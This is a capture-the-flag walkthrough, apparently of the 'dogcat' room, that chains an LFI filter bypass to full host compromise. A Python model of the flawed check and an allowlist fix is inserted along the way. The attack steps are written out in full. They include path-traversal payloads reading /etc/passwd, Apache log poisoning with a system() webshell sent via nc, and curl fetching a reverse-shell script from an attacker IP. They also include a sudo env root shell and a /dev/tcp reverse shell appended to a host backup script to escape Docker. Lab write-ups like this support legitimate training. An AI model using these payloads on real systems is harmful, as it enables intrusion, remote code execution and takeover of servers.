nmap -A 10.10.221.153
The site serves two pages chosen by a view parameter:
http://10.10.221.153/?view=cat
http://10.10.221.153/?view=dog
If view is passed to include, the php://filter wrapper should hand back a page's source base64-encoded instead of executing it. It does:
http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=cat
PGltZyBzcmM9ImNhdHMvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K
which decodes to cat.php:
<img src="cats/<?php echo rand(1, 10); ?>.jpg" />
dog.php is the same with the other directory:
<img src="dogs/<?php echo rand(1, 10); ?>.jpg" />
Next target: /etc/passwd. Asking for it directly is refused:
http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=/etc/passwd
Sorry, only dogs or cats are allowed.
Appending dog to the path (/etc/passwddog) gets past the check:
Here you go!
but the include then throws errors, so the check is a substring match and the real file name is built from the supplied value. Putting dog in a directory component that is immediately cancelled by .. satisfies the check and still resolves to the dog page:
http://10.10.221.153/?view=php://filter/convert.base64-encode/resource=./dog/../dog
Reading index.php the same way gives the source. Only the relevant part is excerpted here:
<?php
function containsStr($str, $substr) {
    // substring test, not an equality test: 'dog' anywhere in the value passes
    return strpos($str, $substr) !== false;
}
// '.php' is only the default when ext is absent; ?ext= (empty) is accepted as-is
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
    if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
        echo 'Here you go!';
        include $_GET['view'] . $ext;   // attacker-controlled path, stream wrappers allowed
    } else {
        echo 'Sorry, only dogs or cats are allowed.';
    }
}
?>
The ext parameter is the important part. It only defaults to .php when it is absent, so sending it empty drops the appended extension and any file can be named in full:
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../index.php
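As an added example (not the room's code and not the author's), the following Python models the view/ext logic from the index.php excerpt above, runs the page's own requests through it, and places an allowlist rewrite beside it to show what removes the bug. The PHP semantics mirrored here (strpos !== false, the .php default applied only when ext is absent, include of the concatenated string) come from the page; the web root /var/www/html, the function names and the hardened version are this example's assumptions.

```python
"""Model of the dogcat view/ext check (vulnerable) next to an allowlist rewrite.
Constructed for this write-up; not the room's code."""

import posixpath
from typing import Optional

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="
WEBROOT = "/var/www/html"          # assumed document root (Apache default)


def contains_str(s: str, sub: str) -> bool:
    """containsStr(): strpos($str, $substr) !== false, i.e. a substring test."""
    return s.find(sub) != -1


def vulnerable_include_target(params: dict) -> Optional[str]:
    """What the original code hands to include, or None when it answers
    'Sorry, only dogs or cats are allowed.'.

    Two defects: the dog/cat test is a substring match on the raw value, and
    ext only defaults to '.php' when absent, so ext= (empty) is honoured."""
    ext = params["ext"] if "ext" in params else ".php"
    view = params.get("view")
    if view is None:
        return None
    if contains_str(view, "dog") or contains_str(view, "cat"):
        return view + ext
    return None


VIEWS = {"dog": "dog.php", "cat": "cat.php"}   # server-side allowlist


def hardened_include_target(params: dict) -> Optional[str]:
    """Allowlist version: the client picks a key, the server picks the file.
    ext is not read from the request at all and no path is built from input."""
    return VIEWS.get(params.get("view"))


def resolve_resource(include_target: str, webroot: str = WEBROOT) -> str:
    """Which file an include string actually lands on. Strips the base64
    filter wrapper (it changes the encoding, not the file) and normalises
    the path against the web root, which is why './dog/../' costs nothing."""
    path = include_target
    if path.startswith(FILTER_PREFIX):
        path = path[len(FILTER_PREFIX):]
    if not path.startswith("/"):
        path = posixpath.join(webroot, path)
    return posixpath.normpath(path)


if __name__ == "__main__":
    # Constructed from the requests tried on the page.
    attempts = [
        {"view": "dog"},
        {"view": "/etc/passwd"},
        {"view": "/etc/passwddog"},
        {"view": FILTER_PREFIX + "./dog/../dog"},
        {"ext": "", "view": FILTER_PREFIX + "./dog/../index.php"},
        {"ext": "", "view": "./dog/../../../../../../../var/log/apache2/access.log"},
    ]
    for p in attempts:
        v = vulnerable_include_target(p)
        landed = resolve_resource(v) if v else "rejected"
        print(f"{p}\n  vulnerable: {landed}\n  hardened:   {hardened_include_target(p) or 'rejected'}")
```

Note that /etc/passwddog passes the vulnerable check but resolves to /etc/passwddog.php, which is the "Here you go!" followed by errors seen above; the ./dog/../ prefix and ext= together are what make the traversal land on a real file.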
Combined with ../ traversal (./dog/../ satisfies the substring check and then steps straight back out), arbitrary files on the box become readable:
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/passwd
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../etc/apache2/apache2.conf
http://10.10.221.153/?ext=&view=php://filter/convert.base64-encode/resource=./dog/../../../../../../../var/log/apache2/access.log
access.log is readable, which is what is needed to turn the LFI into RCE by log poisoning: every request line is written to the log, and including the log executes any PHP in it. Typing the payload into the browser does not work. Entering this:
10.10.221.153?A=<?php phpinfo(); ?</php>
shows up in the log like this:
/?A=%3C?php%20phpinfo();%20?%3C/php%3E
The browser percent-encodes < and >, so PHP never sees an opening tag. Sending the raw request with nc keeps the bytes intact:
nc 10.10.221.153 80
GET /MEOW?<?php phpinfo(); ?>
phpinfo() is a safe first test; once including the log shows its output, plant a one-line webshell the same way that runs whatever is passed in A:
nc 10.10.221.153 80
GET /MEOW?<?php system($_GET[A]); ?>
Every later include of the log re-executes every PHP line in it, so keep it to these few lines: one request with a PHP parse error would make the include fatal and take the RCE with it. Now include the log through the LFI and pass commands in A, here fetching a reverse-shell script s from the attacker box and running it:
http://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=curl%20-o%20/tmp/s%20http://10.13.21.55:8000/s
http://10.10.221.153/?ext=&view=./dog/../../../../../../../var/log/apache2/access.log&A=bash%20/tmp/s
with a listener waiting on the attacker box for the script to call back:
nc -vlk 7877
The first flag is in /var/www/flag.php.
sudo -l
shows that /usr/bin/env can be run as root. env simply executes whatever it is given, so that is a root shell (the GTFOBins env entry):
sudo /usr/bin/env ls /root
sudo /usr/bin/env /usr/bin/sh -p
THM{D1ff3r3nt_3nv1ronments_874112}
Bring linpeas over for the next step:
curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh
/usr/bin/env /tmp/linpeas.sh
It flags /.dockerenv, so this shell is inside a container and root here is not root on the host.
It also points at backup.tar and backup.sh in /var/www/html. Fetch the archive and unpack it:
wget http://10.10.221.153/backup.tar
tar xf backup.tar
The extracted files include launch.sh and a curl to 127.0.0.1.
/opt/backup inside the container is a mount of /root/container/backup on the host, so anything written to /opt/backup lands on the host. backup.sh is:
tar cf /root/container/backup/backup.tar /root/container
That /root/container path only exists on the host, and backup.tar's timestamp is always the current time, so the host is running backup.sh on a schedule out of the shared directory. Whatever gets appended to it runs on the host, as root, on the next run. Add a reverse shell and wait:
echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> backup.sh
nc -vlk 7878
The next run connects back with a root shell on the host:
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}